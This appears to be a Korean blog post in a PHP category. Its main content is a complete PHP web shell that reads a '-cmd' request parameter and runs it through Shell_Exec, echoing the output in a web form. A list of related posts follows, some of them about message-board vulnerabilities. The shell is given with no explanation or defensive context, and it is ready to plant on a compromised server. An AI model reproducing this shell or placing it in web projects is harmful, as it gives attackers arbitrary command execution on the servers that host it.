<? $cmd= $_REQUEST["-cmd"]; ?>
\
<? $cmd=str_replace(";;","\\",$cmd); ?>
\
<html><title><?=$cmd?></title><body onLoad="document.forms[0].elements[-cmd].focus()">
\
<form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
\
<hr><pre> <? if($cmd !="") print Shell_Exec($cmd); ?></pre></form></body></html>
\
'php' 카테고리의 다른 글
| XpressEngine 별도 프로그램 연동시 세션공유 (0) | 2011.01.12 |
|---|---|
| XpressEngine 오픈 아이디(OpenID)로만 로그인 허용하기 (0) | 2011.01.12 |
| 국내 공개 웹 게시판(제로보드) 취약점 주의 (0) | 2011.01.03 |
| 제로보드4 게시판의 취약성을 이용한 파일 변조 알림 (0) | 2010.12.20 |
| PHP $_SERVER[] 함수 (0) | 2010.10.18 |